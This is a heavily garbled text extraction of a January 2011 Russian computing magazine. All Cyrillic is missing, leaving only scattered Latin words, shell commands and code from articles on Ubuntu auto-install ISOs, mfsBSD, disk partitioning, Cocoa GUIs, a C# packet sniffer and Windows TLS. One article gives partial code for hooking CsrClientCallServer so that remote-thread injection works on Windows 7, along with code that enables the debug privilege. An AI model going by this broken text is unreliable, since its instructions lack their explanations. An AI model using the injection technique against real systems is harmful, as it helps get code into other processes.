$ find -type f -print0 | sudo xargs -0 md5sum | \
grep -v isolinux/boot.cat | sudo tee md5sum.txt
5. ISO-:
$ sudo mkisofs -D -r -V "Ubuntu 10.10 AutoInstall" \
-cache-inodes -J -l -b isolinux/isolinux.bin \
-c isolinux/boot.cat -no-emul-boot \
-boot-load-size 4 -boot-info-table \
-o ../ubuntu-10.10-server-i386-auto.iso .
ISO- ,
UNetbootin, ,
ISO-, .
UNetbootin
, ,

UNetbootin , .
ISO-, UNetbootin.
. 30
, .
Debian,
.
,
(, Kickstart RedHat).
Windows Linux. Grub4dos

UNetbootin. ,
, .
Grub4dos Grub,
FAT32 NTFS-, Ubuntu
WinXP.
Grub4dos
Windows , .
sourceforge.net/projects/grub4dos/
files/, Grub4dos
grldr menu.lst C:. c:/boot.ini
[boot loader] :
default=c:\grld
:
X 01 (144) 2011
2. rc.conf,
:
WARNING
$ cp conf/rc.conf.sample conf/rc.conf
:
$ vi conf/rc.conf
# IP-
defaultrouter="192.168.0.1"
#
ifconfig_re0="inet 192.168.0.2 netmask
255.255.255.0"
WinXP
, Netbootin
c:\grldr="Grub4Dos"
. c:/menu.lst
:
title Ubuntu 10.10 AutoInstall
find --set-root /ubuntu-10.10-serveri386-auto.iso
map /ubuntu-10.10-server-i386-auto.iso
(hd32)
map --hook
chainloader (hd32)
. ISO- C:,
, 30 ,
SSH user resu.
Linux FreeBSD.

, . FreeBSD , Linux, , .
, , , :
Linux,
.
FreeBSD, SSH.

mfsBSD (mfsbsd.vx.sk),
FreeBSD, .
, FreeBSD,

sysinstall. :
1. mfsBSD
:
$ wget mfsbsd.vx.sk/release/mfsbsd-1.0.tar.gz
$ tar xzf mfsbsd-1.0.tar.gz
$ cd mfsbsd-1.0
X 01 (144) 2011
re0 .
,
(dmesg ),
(
, , re0 RealTek
8139C, re).
,
DHCP,
:
warning
INFO
ifconfig_re0="DHCP"
3. - ISO-
FreeBSD ( ftp://ftp.freebsd.org, ):
$ sudo mount -o loop \
FreeBSD-8.1-RELEASE-i386-disc1.iso /cdrom
4.
:
info
Linux
VirtualBox

qemu:
$ sudo qemu -hda
/dev/sda -cdrom
ubuntu-10.10-desktop-i386.iso -boot d
$ scp disk.img root@192.168.0.1:.
5. root, :
# dd if=/root/disk.img of=/dev/sda bs=1m
# reboot

root, mfsroot,
sysinstall
FreeBSD.
FTP HTTP.
,

( , ),
.
, , ,
, ,
,
. ,
, , -
. z
093
UNIXOID
Adept adeptg@gmail.com
E
C
R
U
O
S
N
E
P
O

, , ,
, .
OpenSource 2010 .
, .
, Sun Microsystems,
, - ,
2008. 2009 , Oracle,
7 .
2010
. , Oracle (
OpenSource) ,
Sun.
, Java ,
Oracle . bugfix security- JDK6.
Oracle
JDK7 JDK8 2011 2012
.
VM
, , unicode, XML
JDBC.
OpenSolaris , Java: Oracle
.
, Solaris
Express. ,
;
094
( CDDL,
GPL),
. OpenSolaris
.
, Illumos. ,

.
.
Sun Oracle

MySQL. Oracle ,
,
. MySQL,
,
MariaDB. ,
Oracle
MySQL
( Sun).

OpenSource- , Oracle
OpenOffice. 2010 3.2
:
. ,
, , ,

;
MS Office,
,
, ;
OpenType, TrueType;
Calc , .
Sun OpenSource-.
VirtualBox. ,
,
-. ,
(
),
, , USB
RDP-,
RDP-.
, Sun Netbeans.
Oracle . ,
,
. 6.9
( RoR 3, JavaFX
SDK 1.3, ), 2011
7.0.
Linux
Sun , Linux
: 2.6.33-2.6.36. X 01 (144) 2011
HTTP://WWW
links
illumos.org
OpenSolaris
www.documentfoundation.org The
Document Foundation
meego.com

Meego
INFO
FireFox 4
info

Oracle
Sun
][ 131.

FireFox 4

,
:
Nouveau . Nouveau
,
Nvidia -. nv , , 3D-;
DRBD (Distributed Replicated
Block Device) , RAID-1 ;
Ceph () LogFS ( SSD);
. ,
btrfs Direct I/O,
.
,
, , .
XFS ,
,
.

.
CIFS
. Squashfs
LZO;
/

PCI, USB SCSI-;
X 01 (144) 2011
. : ( )
( ).

, , ;
DRM- (Direct Rendering Manager,
Digital Rights Management) Intel
H.264 VC1
G45+;
L2TP 3 (RFC
3931);

: make nconfig.
, menuconfig,
;

AppArmor .
AppArmor
SELinux ,
AppArmor ,
. SELinux .
AppArmor , SELinux
;
Tile,

;
OOM Killer (Out of Memory Killer), , .

-,
,
fork-.
2.6.37, 2011,
: Nouveau DRM
,
Radeon DRM Radeon
HD 5000 , , , HD 6000 .
Intel DRM DisplayPort-. , VIA DRM 2.6.37 ,
. ,
Reiser4
; , , ,
.

. , .
DE 2010
. changelog Gnome
, 3.0 ( ,
6 2011). ,
2.30 2.32:
095
UNIXOID
Meego
Nautilus . /
;
GNOME Keyboard Indicator,
;
gnome-system-tools
: ,
;
GNOME Terminal: ,
;
Brasero FileRoller
PackageKit;
Empathy -,
;
- Epiphany gnomekeyring;
IDE Anjuta Python Vala.
Changelog KDE 2010 :
Plasma Netbook ;
Kwin (,
);
096
;
;
;
Plasma ;
KNetworkManager;
Dolphin ;
Kmail
.
, - k3b 2.0 KDE4
Blu-ray.
KDE 4.6 ( 2011)
:
Kwin;
Nepomuk ;
Plasma ;
PowerDevil v2;
KSnapshot
( ).
,
. OpenSource- Firefox.
netmarketshare.com, 2010
23% . 2010 3.6, 2011 Firefox 4.
FF 3.6:
Acid3 94 100;
15% 3.5;
WOFF.
3.6.2;

Personas;
HTML5- .
FF 3.6 Mozilla
.
,
, .
(3.6.4)
,
. .
X 01 (144) 2011
Plasma Netbook

Mozilla 2010
: : Sothink Web Video Downloader 4.0 Master
Filer. , ( ),
4600 Windows (
). Mozilla ,
.
Firefox4:
, ;
( Google
Chrome).
- WebM VP8;
,
, .
Mozilla Sync;
64- Linux,
Mac OS X Windows;
JetPack, HTML, CSS
Javascript. XUL,
;
WebGL,
3D- . ;
X 01 (144) 2011
2D- (,
Vista/Seven. Linux Mac OS X );
App Tab,
.
,
Pin as App Tab;

.
Firefox ,
, Google Chrome/Chromium.
2010 Google Chrome Linux (
5) :
,
JavaScript;
, ;
HTML5, Web Sockets, Drag-and-drop,
GeolocationAPI App Cache.
2010 Chrome :

( Release Early, Release
Often). 6 ,
- :
- Chrome Web Store.
- Google.
Chrome OS. ,
5%
( 30% App Store);
15% ;
Auto-fill.
,
;
.
6 2010 7:
, ;
,
;
097
UNIXOID
OOo 3.3
OOo 3.3
FileAPI ,
.
Chrome 8 ,
:
2D-
GPU;
WebGL;
;

( , Linux);
:
.
, Ubuntu,
: . 10.04.
, LTS (Long Term Support),
, .

:
. : , , .
LTS-, ;
Nvidia Nouveau;
HAL .
10.10.10 Ubuntu 10.10 :
:
, ,
btrfs, ;
.
, Fluendo. ! , ,
;
Netbook edition Canonical
Unity.

, Canonical
098
. : , (
) ,
gnome-settings-daemon 100% . ,
.
11.04 ( Natty Narwhal, )
Ubuntu Developer Summit:
GNOME 3.0 (GNOME Shell)
Unity. Netbook edition
Desktop edition CD;
- banshee. , ,
Ubuntu mono (f-spot), .
;
, 2.6.38, X.Org Server 1.10 (
X.Org Server 1.09 1.10),
Mesa 7.10, Radeon X1000 (R500)
R300 Gallium3D;
ARM,
.
Ubuntu, Debian, 2010
. , ,
. ,
2010. ,
:
backports.org backports.debian.org. ,
;
rolling- ()
Debian;
Debian: snapshot.debian.org,
. ,

.
RPM-based , Fedora,
, 13 14 :
Btrfs. Yum ;
Python 3, Python 2.
D;
Spice (Simple Protocol for Independent
Computing Environments) ,
QEMU. ,
.
;
MeeGo;
OpenSCAP. SCAP (Security Content Automation Protocol)
,
. OpenSCAP , SCAP, ,
, oscap-scan
, OVAL XCCDF.
BSD- FreeBSD 2010
: 7.3 8.1. 8.1 :
ZFSv14;
X 01 (144) 2011
UltraSPARC IV/IV+, SPARC64 V;

SMP PowerPC G5;

Broadcom, Ralink SiS.
BSD- : OpenBSD
4.7 4.8 (, 19 15 ), DragonFlyBSD
2.6 2.8, PC-BSD 8.0 8.1, NetBSD 5.0.2.
/
, , 2010,
Linux .
Linux Google Android
2010 . ,
Android- Apple iPhone
( , ),
Android Market 100 000.
2010 Android 2.2 :
Adobe Flash 10.1;
Microsoft Exchange;
Dalvik JIT, ;
Wi-Fi;
. ,
;
.
2010 Android 2.3.
:
WebM;
;
;
.
Android ,
Linux . ,
1-2 , . ,
Meego Maemo (Linux
Nokia) Moblin (Linux Intel).
Linux Foundation. Android , Meego
( VCS-, BSD). Meego :
, CarPC.
(1.1) :
Linux 2.6.35, GCC 4.5.0;
X.Org 1.9.0.
Meego ;
Qt 4.7 ,
;
Btrfs.
, ;
Zypper, RPM-;
oFono,
ConnMan;
Tracker;
Bluetooth- BlueZ, D-BUS, GStreamer PulseAudio.
,
-.
Meego AppUp,
Intel Moblin. , , , Meego, ,
(Nokia N900 Aava Mobile). , ( ) ;
.
, Meego (Nokia N9)
2011.
X 01 (144) 2011
KDE.
.

BackTrack.
2.6.34 Fluxbox-. NMAP
: 2010
5.20, 5.30BETA1 5.35DC1
:
UDP-;
100 NSE (Nmap Scripting Engine) ;
600 1300
;
Nping,
;
.
1.4.1 Wireshark (
Ethereal):
80 ;
Python ( *nix, Windows
);
;
JPEG RTP-
Wireshark;
( libpcap 1.0.0 );
( libpcap 1.0.0 ).
- Nikto : 2.1.1-2.1.3.
, :
, ;
2300 RFI (remote file inclusion) ;

;
;
Libwhisker
IDS;
XML- SSL.
2010 Canonical ,
Ubuntu Desktop 12
. .
Linux . 1-2%
.
, 2010
, , Linux
. ,
, Linux (
).z
099
UNIXOID
hatchet maks.hatchet@yandex.ru
, ,

, Linux BSD-
, ,
.
,
. , ,
, Linux-,

,
Linux ,
4 .
:
,
: swap,
, Linux, /home.
Linux-,
. . ,
Linux- , .
-
100
,
:
, , ,
/home-
, .
, , .
:
gparted, parted,
.
, ,
.
parted. - :
$ sudo apt-get install parted

/home:
$ sudo telinit 1
# umount /home
/home
Linux , LiveCD parted. SystemRescueCD (www.sysresccd.
org,
DVD) .
parted :
$ sudo parted /dev/sda
print,
.

( ),
,
(
, , , 62,9GB).
resize _.
Start
<Enter>, End ,
X 01 (144) 2011
2010 , 63
(,
62,8GB). quit
.
. ,
,
LiveCD parted
.
fdisk resize2fs e2fsprogs (
Ext2, Ext3 Ext4). LiveCD, :
# fdisk -l
/
home. , ,
fsck /home (
/dev/sda7)
# fsck -n /dev/sda7
/dev/sda7
, . fdisk:
# fdisk /dev/sda
'd' ( ) (/dev/sda7 =
7).
'n', 'l' ( ).
,
fdisk -l. <Enter> ( fdisk
, ). 'p',
,
'w'. LiveCD.
:
# fsck -f /dev/sda7
resize2fs ,
:
# resize2fs /dev/sda7
:
# fsck -n /dev/sda7
# reboot
X 01 (144) 2011
UUID

.
,
,
,
. ,
, .

,
.
Linux
: unionfs, aufs2 mhddfs.
, ,
, aufs2
. mhddfs (Multi-HDD FileSystem, mhddfs.
uvw.ru) fuse- ,
,
.
,
, . ,
,
(
).
/mnt/disk1, /mnt/disk2 /mnt/disk3,
Music. :

/home/vasya/Music. unionfs :
INFO
info

fstab

Ubuntu
UUID,

blkid:
$ sudo blkid /dev/sda1

dd
,

:
$ sudo watch
-n60 killall
-SIGUSR1 dd
$ sudo mount -t unionfs -o dirs=/mnt/disk1/

Music=rw:/mnt/disk2/Music=rw:/mnt/disk3/
Music unionfs /home/vasya/Music
aufs2 :
$ sudo mount -t aufs none /home/vasya/Music -o
br:/mnt/disk1/Music=rw:/mnt/disk2/Music=rw:/
mnt/disk3/Music=rw,create=mfs,sum
mhddfs :
$ sudo apt-get install mhddfs
$ sudo mhddfs /mnt/disk1/Music,/mnt/disk2/
Music,/mnt/disk3/Music /home/vasya/Music -o
mlimit=10G
101
UNIXOID
NTFS-
1. ntfsprogs:
$ sudo apt-get install ntfsprogs
2. NTFS-:
$ sudo umount /dev/sda1
GParted
, . ( mfs)
,
.
, 10
, ,
.
,
/etc/fstab:
none /home/vasya/Music aufs br:/mnt/disk1/Music=rw:/
mnt/disk2/Music=rw:/mnt/disk3/Music,create=mfs,sum 0 0
,
,
? , Linux , .
:
, / (
).
, Ubuntu 10.10. , ,
.
:
1. LiveCD.
2. , .
Ubuntu ( swap), :
/home. (
cfdisk gparted ) swap.
.
3.
(/dev/sda , /dev/sdb ):
#
#
#
#
#
mkdir
mount
mount
mount
mount
/mnt/{root1,root2,home1,home2}
/dev/sda1 /mnt/root1
/dev/sdb1 /mnt/root2
/dev/sda2 /mnt/home1
/dev/sdb2 /mnt/home2
.
4. :
# cp -ax /mnt/root1/* /mnt/root2
# cp -ax /mnt/home1/* /mnt/home2
5. chroot /mnt/root2, /mnt/

root2/etc/fstab grub. ,
/dev /proc /mnt/root2:
# mount --bind /dev /mnt/root2/dev
# mount --bind /proc /mnt/root2/proc
6. (chroot /mnt/root2) /etc/fstab:
102
3. :
$ sudo ntfsresize -s 10000M /dev/sda1
4. fdisk NTFS-
10000 ;
5. Windows
.
# vi /etc/fstab
/dev/sda1 / ext4 errors=remount-ro 0 1
/dev/sda2 /home ext4 defaults 0 2
/dev/sda3 none swap sw 0 0
/dev/sda1, /dev/sda2 /dev/

sda3. ,
, /dev/sda ( /dev/sdb, ).
7. grub ( grub2):
# grub-mkdevicemap
# grub-mkconfig > /boot/grub/grub.cfg
# sudo grub-install /dev/sdb
8. exit chroot, ,
, , .
,
,
. dd:
# dd if=/dev/sda of=/dev/sdb bs=4k
,
,
,
, . , dd
.
2010

Western Digital,
512 4 ( Advanced
Format). , ,
.
, , Linux, BSD WinXP/
Win2k3, ,
( 3-/4-
).
WD : Windows- WD Align,
512 (
)
;
,
X 01 (144) 2011
Grub2

- :
# dd if=/dev/sda bs=4k | netcat < IP- > 1234
-:
# netcat -l -p 1234 | dd of=/dev/sdb bs=4k
dd
,
dd, ( , ):
# mount /dev/sda1 /mnt
# dd if=/dev/zero of=/mnt/zero bs=4k
# rm -f /mnt/zero
512- ,
, .
, Linux, , ,
. ,
, ,
cfdisk.

64 . fdisk '-u':
# fdisk -u /dev/sdb
'n' ( ), 'p' ( ),
'1' ( ),
64,
( ,
512).
'w'. :
# mkfs.ext4 /dev/sdb1
# mount /dev/sdb1 /mnt
,
. ,
,
X 01 (144) 2011
WD , , WinXP
, .
.
. ,
63
( , 20
, ,
).
, ,

. cfdisk
,
parted "--align optimal",
.
, , , , ,
. ,
, . z
103
CODING
stann ic.man@gmail.com
CSRSS
, Windows 7

: Windows, Microsoft ,
.
, ,
!
, , ,
- CSRSS,
,
, . ,
, .
, , Nimda. , ,

CSRSS , CSRSS ,
. ,
.
CSRSS client/server run-time subsystem ( )

Windows, , /
16- MS-DOS.
, , , CSRSS
.
, Windows.
, ,
CSRSS.EXE ,
104
, .
(!) BSOD, Windows,
: 0x0000004C (FATAL_UNHANDLED_HARD_
ERROR) 0xC000021A (STATUS_SYSTEM_PROCESS_TERMINATED)
(winlogon.exe
csrss.exe). Windows
. , , csrss.exe (
, ),
, (
).
CSRSS ,
, , :
%SystemRoot%\system32\csrss.exe ObjectDirectory=\
Windows SharedSection=1024,3072,512 Windows=On
SubSystemType=Windows ServerDll=basesrv,1 ServerDll
=winsrv:UserServerDllInitialization,3 ServerDll=win
srv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16
X 01 (144) 2011
>> coding
Win32 API Level

kemel32.dll, user32.dll
Native Csr Interface

CsrClientConnectToServer
CsrClientCallServer
CsrGetProcessld
Csr ~
Native LPC API

NtConnectPort
NtCompleteConnectPort
NtRequestWaitReply
NtReplyWaitRequest
NtReplyPost
Nt ~Port
API- CSRSS LPC

, , CSRSS -

. ,
, .
LPC, Local Procedure Calls
, CsrApi, LPC, Windows

.
? , CSRSS
LPC. LPC Local InterProcess Communication. , ,
, LPC,
MSDN- LPC Local Procedure Calls, , .
, LPC Windows, ,
/ .
, .
LPC ( ) (
LPC). ,
ring-,
(r0),
(r3).
LPC- ( PORT_MESSAGE).
LPC : (NtCreatePort,
NtConnectPort, NtListenPort ..)
(NtRequestWaitReplyPort .).

, kernel32!CreateProcess,
kernel32!AllocConsole, kernel32!FreeConsole,
user32!EndTask .
IDA, ,
, CsrClientCallServer, - ,
:
.text:77E96D55
.text:77E96D57
//
.text:77E96D5C
.text:77E96D5F
.text:77E96D61
.text:77E96D67
.text:77E96D68
,
,
, CSRSS.
,
CsrApiRequestThread, csrss.exe,
.
CSRSS .
CsrApi ? .
, , CSRSS
Windows.
X 01 (144) 2011
links

MSDN
,

99%
,

WinAPI.
DVD
dvd
-

.
int main(int argc, char* argv[])

{
NTSTATUS Status;
CSR_API_MSG m;
CONSOLE_TITLE_MSG *consoleTitleMes =
&m.u.ConsoleTitle;
CSR_CAPTURE_HEADER * aptureBuffer;
consoleTitleMes->ConsoleHandle =
GetConsoleHandle();
consoleTitleMes->TitleLen=260;
consoleTitleMes->Unicode=0;
CaptureBuffer = (CSR_CAPTURE_HEADER *)
CsrAllocateCaptureBuffer(
1,
consoleTitleMes->TitleLen);
CsrCaptureMessageBuffer(
CaptureBuffer,
NULL,
consoleTitleMes->TitleLen,
(PVOID *)&consoleTitleMes->Title);
CsrClientCallServer(
(PCSR_API_MSG)&m,
CaptureBuffer,
CSR_MAKE_API_NUMBER(
CONSRV_SERVERDLL_INDEX,
CONSRV_FIRST_API_NUMBER+38),
sizeof(m));
printf("ConsoleTitle is : %s\n",
m.u.ConsoleTitle.Title);
return 0;
CsrClientCallServer
!
CsrApi- CsrClientCallServer.
PUSH 4
PUSH 20225h
MOV [EBP+var_7C], EAX

PUSH 0
LEA EAX, [EBP + var_A4]
PUSH EAX
CALL CsrClientCallServer
HTTP://WWW
105
CODING
,
CsrApi- , .
, CSRSS? , . , Windows 7.
, Windows 7

CreateRemoteThread . ,
, Microsoft ,
. CreateRemoteThread ,
, NULL
ERROR_NOT_ENOUGH_MEMORY.
:).
, RtlCreateUserThread (
: http://forum.gamedeception.net/threads/17097-Simpleinjector-(cmd-line-unicode-xp-vista-w7)),
; .
CSRSS,

status quo
. PoC . ,
CreateRemoteThread
CsrClientCallServer, . ,
. CreateRemoteThread NtCreateThreadEx,
CREATE_SUSPENDED,
CSRSS
CsrClientCallServer. ?
:) , , CsrClientCallServer
. .
kernelbase.dll ( kernel32.dll Windows 7, ):
kernelbase.dll
.text:7597BD24
.text:7597BD26
.text:7597BD2B
.text:7597BD2C
.text:7597BD32
.text:7597BD33
.text:7597BD39
.text:7597BD3F
.text:7597BD45
.text:7597BD4B
}
...
DWORD ImportAddress;
DWORD OriginalCsrClientCallServer, OldProtect;
ImportAddress = GetImportAddressFromIat(
GetModuleHandle("kernelbase.dll"),
"CsrClientCallServer");
VirtualProtect(( VOID *) ImportAddress,
sizeof(DWORD),
PAGE_EXECUTE_READWRITE,
&OldProtect);
OriginalCsrClientCallServer =
*(DWORD*)ImportAddress;
*(DWORD*)ImportAddress =
(DWORD)NewCsrClientCallServer;
...
! , , ! CsrClientCallServer success, , , CreateRemoteThread.

, : ,
, ( )
0day-, ,
..,
. , :).
,
-, :
unsigned long GetDebugPrivileges()
{
TOKEN_PRIVILEGES tokenPrvlgs;
if(!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES, &hToken))
return error;
PUSH 0C
PUSH 10001
PUSH EBX
LEA EAX, DWORD PTR SS:[EBP-210]
PUSH EAX
CALL NEAR DWORD PTR
DS:[<&ntdll.CsrClientCallServer>]
; ntdll.CsrClientCallServer
MOV EAX, DWORD PTR SS:[EBP-1F0]
MOV DWORD PTR SS:[EBP-218], EAX
CMP DWORD PTR SS:[EBP-218], EBX
JL KERNELBA.75999564
kernelbase.dll,
, CsrClientCallServer

CsrClientCallServer,
. . :
ULONG NewCsrClientCallServer(
PVOID Arg1,
PVOID Arg2,
ULONG Arg3,
ULONG Arg4)
{
106
*( DWORD *)(( BYTE *)Arg1 + 0x20 ) = 0;

return 0;
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME,
&tokenPrvlgs.Privileges[0].Luid))
return error;
tokenPrvlgs.PrivilegeCount = 1;
tokenPrvlgs.Privileges[0].Attributes =
SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken, FALSE,
&tokenPrvlgs, 0, NULL, NULL))
{
return error;
}
CloseHandle( hToken );
return success;
}
, . Windows 7,
. , ,
, . , !
P.S. CSRSS!
:). z
X 01 (144) 2011
>> coding
WEXLER.HOME 902
, ,
.
, .
, , . ?
? , !
. . WEXLER.
HOME 902 ,
.
WEXLER.HOME 902 Intel Core i7-970 3,2

- 12 . CPU
Turbo Boost, . , :
- , .
WEXLER.HOME 902 GeForce GTX 460,
Fermi.
DirectX 11 GTX 460
, NVIDIA 3D Vision, PhysX CUDA ,
.
WEXLER.HOME 902
12 . . , , ,
. ,
,
.
. WEXLER.HOME 902 700 ,
.
WEXLER.HOME 902
Windows 7 .
64- :
12 . , Microsoft Office
Microsoft Security Essentials. World of Tanks, 4099 .
,
, .
: www.wexler.ru
CODING
seva@vingrad.ru
GUI

Mac OS X

Mac OS X Objective-C
Cocoa. , ,
.
GUI- Cocoa Objective-C.
Code

, XCode,
Mac OS X Apple. ,
: , ,
..
Interface Builder.
, XCode 4 Interface Builder
, - ,
XCode Apple Interface Builder
IDE, , .
, XCode 4 ( ,
.. , . .) ,
108
, XCode Interface Builder .

GUI-
.

, . , ,
, :
, , , ,
.., ..
X 01 (144) 2011
>> coding
Cocoa
MainMenu.xib Interface Builder
,
XCode , , . ,
IDE. , , command-line , , , kext,
iOS.
XCode
. , , , .
XCode ( XCode ,
Apple).
, , File
New Project. ,
. Cocoa Application ,
Cocoa.
, , XCode
.
:

#import <Cocoa/Cocoa.h>
int main(int argc, char * argv[])
{
return NSAppliction(argc, (const char**) argv);
}
NSApplication.
. (
)
.
(Build Build and
Go), . ?
? .
- NIB Files ( -, NIB Files
Interface Buildera) MainMenu.xib.
Interface Builder,
, Mac OS
X .
. IB .
X 01 (144) 2011
,
. Tools Library (,
, XCode, Interface Builder)
,
drag-and-drop.
, .
,
. -
:).
(Tools
Inspector). ,
.
.
, . , , ,
Interface Builder. ?
, ,
? -
... .
- .
.
XCode ( , Interface
Builder?) AppConroller (File New
File Cocoa Objective-C class). XCode
AppController.h AppController.m . Interface Builder
AppController ,
AppController.
AppController.h InterfaceBuilder.
. - - . ! ,
. Interface Builder Tools Library
Object .
,
AppController.
MainMenu.xib,
, , ,
.
, ,
, .
109
CODING
AppController
//
// Cocoa.h
#import <Cocoa/Cocoa.h>
@interface AppController : NSObject
{
// .
//
// .
IBOutlet NSTextField * FirstNumber;
IBOutlet NSTextField * SecondNumber;
IBOutlet NSTextField * Result;
}
//
//
- (IBAction) buttonClick: (id) sender;
@end
//
#import AppController.h
@implementation AppController
//
- (IBAction) buttonClick: (id) sender
{
//
//
[Result setIntValue:
[FirstNumber intValue] +
[SecondNumber intValue]];
}
@end
IBOutlet IBAction,
, . , ,
Interface Builder Outlet ( ) Interface
Builder Action , GUI. , ,
Interface Builder. :
. AppController
InterfaceBuilder;
. ,
IBAction .
, - .
110
,

2D-,
-
Build and Go (. ).
, : Cocoa
, , ,
. (
).
, ,
. , ? -
? , :).
Mac OS X , ,
Cocoa.
Mac OS X Quarz. , 2D-,
-, NSView.
drawRect .
XCode MyView.h MyView.m .
MyView.h
Interface Builder. Library
CustomView, MyView .
(
).
.
- , -.
(path) .
Cocoa- NSBezierPath (. ).
, GUI Cocoa-.
iOS iPhone iPad
,
, . ! z
X 01 (144) 2011
>> coding
It works!
MyView
//
// XCode
// .
#import "MyView.h"
center_x < center_y ? center_x : center_y;

//
NSBezierPath * black_side =
[NSBezierPath bezierPath];
@implementation MyView
// XCode
// :)
- (id)initWithFrame:(NSRect)frame {
self = [super initWithFrame:frame];
if (self) {
// Initialization code here.
}
return self;
}
//
//
// 2D-
- (void)drawRect:(NSRect)rect
{
//
[[NSColor grayColor] set];
//
NSRectFill( rect );
//
[black_side appendBezierPathWithArcWithCenter:
center
radius: radius
startAngle: 90
endAngle: 270
clockwise: YES];
//
NSBezierPath * circle =
[NSBezierPath bezierPathWithOvalInRect: rect];
//
[circle setLineWidth: 2.0];
//
[[NSColor whiteColor] set];
[circle fill];
//
[[NSColor blackColor] set];
//
[circle stroke];
// ;
// c ,
float center_x = rect.size.width / 2.0;
float center_y = rect.size.height / 2.0;
NSPoint center = {center_x, center_y};
NSPoint center_up = {center_x, center_y * 0.5};
NSPoint center_dn = {center_x, center_y * 1.5};
float radius =
X 01 (144) 2011
//
center_up
radius: radius / 2
startAngle: 270
endAngle: 90
clockwise: NO];
//
center_dn
radius: radius / 2
startAngle: 270
endAngle: 90
clockwise: YES];
//
[[NSColor blackColor] set];
[black_side fill];
//
[[NSBezierPath bezierPathWithOvalInRect:
NSMakeRect(center_x - radius / 6.0,
center_y - radius * (0.5 + 1/6.0),
radius / 3.0, radius/3.0)] fill];
//
[[NSColor whiteColor] set];
[[NSBezierPath bezierPathWithOvalInRect:
NSMakeRect(center_x - radius / 6.0,
center_y + radius * (0.5 - 1/6.0),
radius / 3.0, radius/3.0)] fill];
}
@end
111
CODING
c0n Difesa condifesa@gmail.com, http://defec.ru
(, ),
- ( ),

. +
,
.

, .
, , Wireshark: ,
TCP-,
,

. ,
, CommView.
, , ,
. Wireshark
PCAP (Packet Capture),
. ,
, .
112
CommView,
NDIS-,
.
,
, .

,
. ,
- , ,
, .

. ,
, -
X 01 (144) 2011
>> coding

, ,

,
, ,

.

.
,
,

,
.

,

,
, .
,
, , ,
-
, , . ,

. ,

, ,
.
, ,
, .
+ = ?

.
-, , :
;
X 01 (144) 2011

(
PCAP );
( );
- ;
;
,
.

(
,

, ).

,

.
-, ,
-
,
. ,
, -
, .
, , -,
,
.

.
HTTP://WWW
links
http://defec.ru/wtf_wcf
Windows
Communication
Foundation:

.
www.xakep.ru/
post/16494/

PCAP.
www.codeproject.
com/KB/IP/
CSNetworkSniffer.aspx

(.) C#.
www.xakep.
ru/magazine/
xa/135/096/1.asp
,

.NET Remoting.
Windows
Communication Foundation, .NET Framework ( WCF
WTF WCF?! Windows Communication Foundation:
).
, C#.
,
DVD
dvd

.NET Remoting.
113
CODING
IPv4 Header
IP-
.
IP-, IOControl
ReceiveAll,
,
.

, .

:
TCP;
UDP;
IP;
DNS.
, HTTP, SMTP, FTP TCP, , ,
IP: ,
,
.
(raw socket), -
114

// raw-
mainSocket = new Socket(
AddressFamily.InterNetwork,
SocketType.Raw, ProtocolType.IP);
// IP-
mainSocket.Bind(newIPEndPoint(
IPAddress.Parse(cmbInterfaces.Text),0));
/* IP-
*/
mainSocket.SetSocketOption(
SocketOptionLevel.IP,
SocketOptionName.HeaderIncluded,
true);
mainSocket.IOControl(
IOControlCode.ReceiveAll,
byTrue,// ,
byOut);// ,
//
mainSocket.BeginReceive(byteData, 0,
byteData.Length, SocketFlags.None,
newAsyncCallback(OnReceive), null);
: IPHeader, DNSHeader, TCPHeader.

IPHeader.
IPHeader
public class IPHeader
{
/* ,
IP- */
/* ,
*/
X 01 (144) 2011
>> coding
AddTreeNode addTreeNode =
new AddTreeNode(OnAddTreeNode);
()

(-)
public IPHeader(byte[] byBuffer, int nReceived)

{
}
}
TCP
UDP: , IP-.
,
- , ( ,
RFC).
, .
(,
) ,

, , ,
,
. . ,

:
/* ,
, IP-*/
private TreeNode MakeIPTreeNode(IPHeader ipHeader)
{
//
TreeNode ipNode = new TreeNode();
//
return ipNode;
}

:
X 01 (144) 2011

.
- .NET Remoting.
.

, -,
,

:
/*
*/
RemotingConfiguration.Configure("Client.exe.txt");
//
Test test = new Test();
//
test.SendLog(rootNode);
, SendLog()
, , rootNode.
, Result,
:
public void SendLog(string SensorLog)
{
//
Result = Result + SensorLog;
}
,
, Result .
//
test.Show()
Show() ,
Result .
Show() :
,
(, ) ,
.
? , !
(,
! -, :) ..)
: ,
, , - ,

.
, ,
, ,
.
, ! z
115
CODING
deeonis deeonis@gmail. com

TLS
, ,
, .
.
, ...
.
,
.
? .
strtok C++.
, , .
. ,
strtok ,
.
,
,
,
.
.
, .
,
.

//
int tls_i;
char tls_char[25];
//
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
//

tls_i = (int)lpParam;
lstrcpy(tls_char,"array of char");
char szMsg[80];
wsprintf( szMsg, "Parameter = %d.", tls_i );
MessageBox( NULL, szMsg, "ThreadFunc", MB_OK );
return 0;
}
int APIENTRY WinMain(
116
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD dwThreadId;
CreateThread(NULL, 0, ThreadFunc,
(LPVOID)1, 0, &dwThreadId);
Sleep(10000);
// 10
return 0;
}
, .
/
.
. ,
, ,
,
thread-local storage (TLS).
thread-local storage?
TLS
. ,
, ,
. ,
. , .

DLL, ,
.
.
TLS : .

X 01 (144) 2011

TLS (TLS_MINIMUM_AVAILABLE - 1)
0
0
TLS_MINIMUM_AVAILABLE - 2)
0
0
TLS_MINIMUM_AVAILABLE - 2
,
.
.
thread-local storage Windows

API. : TlsAlloc, TlsGetValue,
TlsSetValue TlsFree. ,
, , TLS .
.

FREE INUSE, , . TLS_MINIMUM_
AVAILABLE . ,
Windows 98/Me 80, Windows 2000/XP
1088. TLS_
MINIMUM_AVAILABLE PVOID.
TlsAlloc ,
. ,
FREE . TlsAlloc
: DWORD WINAPI TlsAlloc(void).
, TLS_OUT_OF_INDEXES.
TlsSetValue, ,

.
TlsAlloc,
, TLS.
TlsSetValue, PVOID-.
- .
TlsSetValue
BOOL WINAPI TlsSetValue(
__in DWORD dwTlsIndex,
X 01 (144) 2011
__in LPVOID lpTlsValue

);
, TlsGetValue
, . : PVOID TlsGetValue(DWORD
dwTlsIndex). TlsSetValue, TlsGetValue
dwTlsIndex , TlsAlloc.
, , TlsFree. ,
